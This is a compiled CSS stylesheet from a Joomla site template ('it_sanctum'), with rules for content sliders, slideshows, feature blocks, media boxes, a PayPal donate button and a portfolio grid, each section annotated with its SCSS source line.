.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
/* line 48, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
/* line 50, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 51, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
/* line 57, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 62, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  /* line 67, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
/* line 72, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-image, .g-content-pro-slider .g-content-pro-image, .g-content-pro-slideset .g-content-pro-image {
  width: 100%;
  background-position: center;
  background-size: cover;
}
/* line 76, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
  width: 100%;
  height: 100%;
}
/* line 81, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
/* line 85, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 89, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
/* line 92, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
/* line 94, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
/* line 96, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
/* line 101, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 10px;
}
/* line 104, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 105, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
/* line 107, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
/* line 110, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #fff;
}
/* line 112, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
/* line 117, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2 .g-article-details, .g-content-pro-slider .g-info-container-style2 .g-article-details, .g-content-pro-slideset .g-info-container-style2 .g-article-details {
  color: #eee;
}
/* line 121, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details, .g-content-pro-slider .g-article-details, .g-content-pro-slideset .g-article-details {
  margin-top: 10px;
  font-size: 90%;
  color: #bbb;
}
/* line 125, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details > span, .g-content-pro-slider .g-article-details > span, .g-content-pro-slideset .g-article-details > span {
  margin-right: 10px;
}
/* line 127, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details > span:last-child, .g-content-pro-slider .g-article-details > span:last-child, .g-content-pro-slideset .g-article-details > span:last-child {
  margin-right: 0;
}
/* line 130, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details > span i, .g-content-pro-slider .g-article-details > span i, .g-content-pro-slideset .g-article-details > span i {
  margin-right: 5px;
}
/* line 135, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-read-more, .g-content-pro-slider .g-article-read-more, .g-content-pro-slideset .g-article-read-more {
  margin-top: 15px;
}
/* line 138, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 139, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient( top , rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
/* line 142, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #fff;
}
/* line 144, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #fff;
  text-decoration: underline;
}
/* line 150, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 151, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 152, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
/* line 156, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 157, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 158, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 1, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-panel {
  padding: 25px;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  /* line 6, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  /* line 12, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  /* line 21, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  /* line 27, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
}
/* line 38, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-overlay-container {
  width: 75rem;
  margin-left: auto;
  margin-right: auto;
  padding-left: 25px !important;
  padding-right: 25px !important;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-slideshow .g-overlay-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .g-overlay-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.062rem) and (max-width: 47.938rem) {
  .g-slideshow .g-overlay-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-slideshow .g-overlay-container {
    width: 100%;
  }
}
/* line 57, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 58, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .nav-visible .uk-slidenav {
  opacity: 1;
}
/* line 62, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-title {
  margin: 0 0 15px;
  color: #fff !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-title {
    margin: 0;
    font-size: 1rem;
  }
}
/* line 70, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-desc {
  margin: 0;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-desc {
    display: none;
  }
}
/* line 75, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-desc a:not(.button) {
  color: #4f953b;
}
/* line 77, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-desc a:not(.button):hover {
  text-decoration: underline;
}
/* line 82, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons {
  margin: 25px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-buttons {
    margin: 15px 0 0;
  }
}
/* line 87, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button {
  margin-right: 15px;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 91, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button:hover {
  background: #5eb247;
  border-color: #5eb247;
}
/* line 96, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button:last-child {
  margin-right: 0;
}
/* line 99, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button > span {
  margin-right: 10px;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  /* line 106, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  /* line 114, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
/* line 118, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button.empty {
  background: none;
  border: 2px solid #4f953b;
  color: #4f953b;
}
/* line 122, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button.empty:hover {
  background: #4f953b;
  border-color: #4f953b;
  color: #fff;
}
/* line 130, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-flex-center {
  text-align: center;
}
/* line 133, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 {
  padding: 70px 0;
}
/* line 135, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-title {
  padding: 15px 25px;
  background: #fff;
  color: #1a1a1a !important;
  font-size: 2rem;
  display: table;
  margin-bottom: 20px;
}
/* line 143, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-desc {
  padding: 15px 20px;
  background: #1a1a1a;
  color: #fff !important;
  font-size: 1.2rem;
  display: table;
}
/* line 150, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 151, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button {
  font-size: 1.2rem;
}
/* line 153, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.standard {
  background: #fff;
  border-color: #fff;
  color: #1a1a1a;
}
/* line 157, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.standard:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #fff;
}
/* line 163, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.empty {
  border-color: #fff;
  color: #fff;
}
/* line 166, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2 .g-slideshow-buttons .button.empty:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #fff;
}
/* line 174, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 175, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2.uk-flex-right .g-slideshow-title, .g-slideshow .style2.uk-flex-right .g-slideshow-desc {
  margin-left: auto;
}
/* line 179, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 180, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2.uk-flex-center .g-slideshow-title {
  margin: 0 auto 20px;
}
/* line 183, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style2.uk-flex-center .g-slideshow-desc {
  margin: auto;
}
/* line 188, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 189, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style3 .g-slideshow-title {
  font-size: 2rem;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.2rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.4rem;
  }
}
/* line 198, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .style3 .g-slideshow-desc {
  font-size: 17px;
  line-height: 30px;
}
/* line 203, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 204, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 205, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .dark-text .style3 .g-slideshow-title {
  color: #959595 !important;
}
/* line 208, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .dark-text .style3 .g-slideshow-desc {
  color: #959595;
}
/* line 213, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-dotnav {
  margin: 0 0 35px;
}
/* line 216, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 217, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-item iframe {
  pointer-events: auto !important;
}
/* line 221, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 222, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .slideshow-caption.uk-overlay-background {
  padding: 25px;
}
/* line 226, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-left-short {
  -webkit-transform: translateX(-10%);
  -moz-transform: translateX(-10%);
  -ms-transform: translateX(-10%);
  -o-transform: translateX(-10%);
  transform: translateX(-10%);
}
/* line 229, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-right-short {
  -webkit-transform: translateX(10%);
  -moz-transform: translateX(10%);
  -ms-transform: translateX(10%);
  -o-transform: translateX(10%);
  transform: translateX(10%);
}
/* line 232, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-top-short {
  -webkit-transform: translateY(-10%);
  -moz-transform: translateY(-10%);
  -ms-transform: translateY(-10%);
  -o-transform: translateY(-10%);
  transform: translateY(-10%);
}
/* line 235, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-bottom-short {
  -webkit-transform: translateY(10%);
  -moz-transform: translateY(10%);
  -ms-transform: translateY(10%);
  -o-transform: translateY(10%);
  transform: translateY(10%);
}
/* line 238, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-scale {
  -webkit-transform: scale(0.8);
  -moz-transform: scale(0.8);
  -ms-transform: scale(0.8);
  -o-transform: scale(0.8);
  transform: scale(0.8);
}
/* line 241, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-left-short, .g-slideshow .uk-overlay-right-short, .g-slideshow .uk-overlay-top-short, .g-slideshow .uk-overlay-bottom-short {
  -webkit-transition-duration: 0.5s;
  -moz-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
/* line 244, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 245, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 246, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-active .uk-active .uk-overlay-scale {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
/* line 251, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow audio, .g-slideshow canvas, .g-slideshow video {
  display: block;
}
/* line 256, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 257, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 258, templates/it_sanctum/scss/sanctum/_slideshow.scss */
#g-fullwidth .g-slideshow .g-content, .g-flushed .g-slideshow .g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
/* line 1, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 4, templates/it_sanctum/scss/sanctum/_main-feature.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-left .g-content {
  margin: 0 0.625rem 0 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 11, templates/it_sanctum/scss/sanctum/_main-feature.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-right .g-content {
  margin: 0 0 0 0.625rem;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-right.align-right {
  text-align: right;
}
/* line 21, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-title {
  margin-top: -5px;
}
/* line 24, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .image-bottom {
  margin-bottom: -4.563rem;
}
/* line 27, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-link {
  margin-top: 5px;
}
/* line 29, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-link i {
  margin-right: 10px;
}
/* line 32, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-link.g-button2 {
  margin-left: 25px;
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link.g-button2 {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link {
    display: block;
  }
}
/* line 42, templates/it_sanctum/scss/sanctum/_main-feature.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_main-feature.scss */
.g-main-feature .g-main-feature-desc i {
  margin-right: 8px;
}
/* line 47, templates/it_sanctum/scss/sanctum/_main-feature.scss */
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
/* line 4, templates/it_sanctum/scss/sanctum/_media-box.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid {
  margin-bottom: 1.25rem;
}
/* line 7, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid:last-child {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid .g-block {
  margin-right: 1.25rem;
}
@media only all and (max-width: 47.938rem) {
  .g-media-box .g-grid .g-block {
    margin-right: 0;
    margin-bottom: 1.25rem;
  }
}
/* line 16, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-grid .g-block:last-child {
  margin-right: 0;
}
@media only all and (max-width: 47.938rem) {
  .g-media-box .g-grid .g-block:last-child {
    margin-bottom: 0;
  }
}
/* line 25, templates/it_sanctum/scss/sanctum/_media-box.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content {
  background: #fff;
  padding: 2rem;
  border: 1px solid #ddd;
}
/* line 31, templates/it_sanctum/scss/sanctum/_media-box.scss */
/* line 32, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
  color: #959595;
  background: transparent;
  border: 1px solid #ddd;
  width: 3rem;
  height: 3rem;
  line-height: 3rem;
  text-align: center;
  cursor: pointer;
  display: inline-block;
  -webkit-transition: 0.2s;
  -moz-transition: 0.2s;
  transition: 0.2s;
}
/* line 43, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
@media only all and (max-width: 47.938rem) {
  .g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
    width: 2.5rem;
    height: 2.5rem;
    line-height: 1.5rem;
    padding: 0.5rem;
  }
}
/* line 55, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-media-box-play {
  position: absolute;
  margin-top: -2.5rem;
}
/* line 59, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-item-text {
  visibility: hidden;
  position: absolute;
  width: 0;
  height: 0;
}
/* line 67, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-desc {
  margin: 1.5rem 0;
  padding-bottom: 1.5rem;
  border-bottom: 1px solid #ddd;
}
/* line 72, templates/it_sanctum/scss/sanctum/_media-box.scss */
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-special1, .g-media-box .g-media-box-item .g-media-box-content .g-media-box-special2 {
  margin: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
  text-align: center;
}
/* line 5, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
/* line 6, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form form {
  margin: 0;
}
/* line 9, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
/* line 10, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 1.5rem;
  background: rgba(0, 0, 0, 0.2);
}
/* line 14, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  background: transparent;
  padding: 1.25rem;
  margin-top: -3px;
}
/* line 20, templates/it_sanctum/scss/sanctum/_paypal-donate.scss */
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button.button {
  padding: 0;
  border: 0;
}
/* line 4, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter {
  margin-bottom: 30px;
}
/* line 10, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter.uk-subnav > * > * {
  color: #959595;
}
/* line 13, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 3px 8px;
  border: 1px solid #ddd;
  background: #fff;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 18, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:focus, .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:hover {
  background: #fff;
  box-shadow: none;
  border: 1px solid #4f953b;
  color: #4f953b;
}
/* line 25, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-filter .uk-active > a {
  background: #fff;
  border: 1px solid #4f953b;
  color: #4f953b;
  box-shadow: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-item {
  border: 1px solid #ddd;
}
/* line 37, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.gutter-disabled .g-portfolio-item {
  border: none;
}
/* line 42, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-image > a {
  display: block;
}
/* line 47, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 51, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio p {
  margin: 0;
}
/* line 54, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-title {
  margin: 0;
}
/* line 56, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-title a {
  color: #282828;
}
/* line 58, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-title a:hover {
  color: #4f953b;
}
/* line 63, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-item-details {
  margin-top: 10px;
  font-size: 90%;
  color: #c8c8c8;
  font-style: italic;
}
/* line 68, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-item-details i {
  margin-right: 5px;
}
/* line 72, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-desc {
  margin-top: 10px;
}
/* line 75, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
/* line 78, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
/* line 81, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel a {
  color: #fff;
}
/* line 83, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
/* line 88, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-info-container-style2 .g-portfolio-special, .g-portfolio .g-info-container-style2 .g-item-details {
  color: #eee;
}
